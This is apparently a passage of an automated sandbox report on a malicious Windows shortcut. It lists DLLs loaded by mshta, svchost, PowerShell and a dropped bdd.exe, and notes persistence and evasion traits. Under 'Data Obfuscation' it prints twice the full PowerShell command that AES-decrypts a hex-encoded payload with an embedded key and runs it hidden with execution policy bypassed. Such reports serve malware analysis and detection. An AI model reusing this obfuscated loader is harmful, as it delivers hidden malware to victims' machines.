Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: quartz.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: faultrep.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: mstscax.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: msacm32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: mfreadwrite.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: mfcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: ksuser.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: ei0woJS3Dy.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\sftp.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: ntdll.pdb source: bdd.exe, 00000012.00000002.1802179098.0000000006316000.00000004.00000020.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1810507895.00000000069C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: bdd.exe, 00000012.00000002.1802179098.0000000006316000.00000004.00000020.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1810507895.00000000069C0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)Jump to behavior
Source: bdd.exe.9.drStatic PE information: section name: .didata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C0D600BD pushad ; iretd 5_2_00007FF7C0D600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF7BFCB00BD pushad ; iretd 9_2_00007FF7BFCB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF7BFCB19AD push E95F4C2Dh; ret 9_2_00007FF7BFCB1A59

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bdd.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: torConnect
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
